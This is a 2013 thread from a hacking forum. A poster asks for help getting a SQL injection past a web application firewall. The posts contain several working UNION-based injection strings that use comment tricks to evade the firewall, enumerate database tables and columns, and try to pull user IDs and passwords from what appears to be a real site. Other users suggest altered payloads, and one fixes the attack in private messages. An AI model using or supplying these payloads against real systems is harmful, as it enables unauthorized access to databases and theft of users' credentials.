Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 02, 2013 09:15PM

hi after many test and check im blocked here :

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/.tables limit 10,1--

i can get "user" , all okayyy :

now with this :

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/.columns where table_name='users'--




im also do this :

.......table_name=CHAR(117, 115, 101, 114, 115)--

but i get nothing i can't extract data , what's my mistak,

no error and no data :(

tell me what's wrong plz, thnk's ,and for all your replay for my previos topic (thanggiangho, hack2012 ,ajkaro... ) it's help than ky u very much :)

Options: ReplyQuote
Re: i can get data, plz help with this waf !!!!!
Posted by: ajkaro
Date: May 03, 2013 07:16AM

Send me your URL to PM if you want me to check...

Options: ReplyQuote
Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 04, 2013 05:05AM

ok i have this table :
i get table like this :

-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/./*!tables*/ where table_schema=database() limit 12,1--

i have table


user

with this column :

this is commande :


-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/./*!columns*/ where table_schema=database() limit 18,1--

user_id
user_nom
user_description
user_password



but when i do this :


-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(user_id)),4,5,6,7,8,9+from+user--



i have this :


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in


what's wrong :(

Options: ReplyQuote
Re: i can get data, plz help with this waf !!!!!
Posted by: hack2012
Date: May 04, 2013 06:35AM

may be you can try :
-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,user_id,4,5,6,7,8,9+from+user--
or
-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!user_id*/,4,5,6,7,8,9+from+user--

Options: ReplyQuote
Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 04, 2013 07:43AM

thnk's for replay

it's not worknig

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

alawys this message :(

Options: ReplyQuote
Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 06, 2013 05:02PM

plz check your MP.



"Posted by: ajkaro
Send me your URL to PM if you want me to check..."

Options: ReplyQuote
Re: i can get data, plz help with this waf !!!!!
Posted by: ajkaro
Date: May 06, 2013 06:57PM

solved. See your PM...

Options: ReplyQuote
Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 06, 2013 08:02PM

thnk's men u are the best

sorry for misunderstanding plz read my PM.

Options: ReplyQuote


Sorry, only registered users may post in this forum.